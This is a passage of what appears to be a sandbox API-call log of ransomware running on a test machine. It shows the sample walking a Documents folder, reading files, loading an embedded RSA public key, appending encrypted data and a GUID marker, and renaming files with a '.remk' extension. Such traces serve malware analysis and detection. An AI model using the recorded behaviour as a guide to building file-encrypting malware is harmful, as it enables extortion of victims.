Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.352] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.353] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.354] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.354] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.354] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.354] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.354] CloseHandle (hObject=0x640) returned 1 [0235.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0235.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x37bd408 [0235.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0235.358] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\JsGQxG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\jsgqxg.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\JsGQxG.ots.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\jsgqxg.ots.remk")) returned 1 [0235.361] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.361] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.361] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.362] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf16a9040, ftCreationTime.dwHighDateTime=0x1d5db7f, ftLastAccessTime.dwLowDateTime=0x839d9360, ftLastAccessTime.dwHighDateTime=0x1d5e5d3, ftLastWriteTime.dwLowDateTime=0x839d9360, ftLastWriteTime.dwHighDateTime=0x1d5e5d3, nFileSizeHigh=0x0, nFileSizeLow=0x10618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lfe5b.xlsx", cAlternateFileName="LFE5B~1.XLS")) returned 1 [0235.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.362] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0235.362] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0235.362] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\Lfe5b.xlsx") returned=".xlsx" [0235.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\Lfe5b.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\lfe5b.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.364] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=67096) returned 1 [0235.364] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.366] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x105f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.366] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.368] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.368] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.368] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.368] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10618, lpOverlapped=0x0) returned 1 [0235.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.369] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.369] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0235.370] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.370] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.370] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.370] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.370] GetLastError () returned 0x0 [0235.370] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.370] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0235.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.370] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.370] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.370] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.370] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10620) returned 0x37c6278 [0235.370] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cbf0 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea78 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325cc38 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaf0 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.371] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eeaa8 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eea90 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeaa8 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0235.372] GetCurrentThreadId () returned 0x314 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4560 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.372] GetCurrentThreadId () returned 0x314 [0235.372] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeac0 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eeaa8 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eead8 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc420 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc438 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc450 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc468 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc450 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc450 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc438 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eea90 | out: hHeap=0x630000) returned 1 [0235.374] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eea90 [0235.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eeac0 | out: hHeap=0x630000) returned 1 [0235.375] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10618, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.375] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.376] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.376] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.376] CloseHandle (hObject=0x640) returned 1 [0235.377] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\Lfe5b.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\lfe5b.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\Lfe5b.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\lfe5b.xlsx.remk")) returned 1 [0235.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.378] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.378] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.379] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.379] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef9011e0, ftCreationTime.dwHighDateTime=0x1d5e238, ftLastAccessTime.dwLowDateTime=0x7f398650, ftLastAccessTime.dwHighDateTime=0x1d5e7de, ftLastWriteTime.dwLowDateTime=0x7f398650, ftLastWriteTime.dwHighDateTime=0x1d5e7de, nFileSizeHigh=0x0, nFileSizeLow=0x12884, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yjx2jpn3OrZ-WfDHJ.pps", cAlternateFileName="YJX2JP~1.PPS")) returned 1 [0235.379] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\yjx2jpn3OrZ-WfDHJ.pps") returned=".pps" [0235.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\R3pat\\yjx2jpn3OrZ-WfDHJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\r3pat\\yjx2jpn3orz-wfdhj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0235.380] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=75908) returned 1 [0235.380] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0235.382] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1285e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.382] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0235.384] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x12884, lpOverlapped=0x0) returned 1 [0235.385] lstrlenA (lpString="-----BEGIN PUBLIC 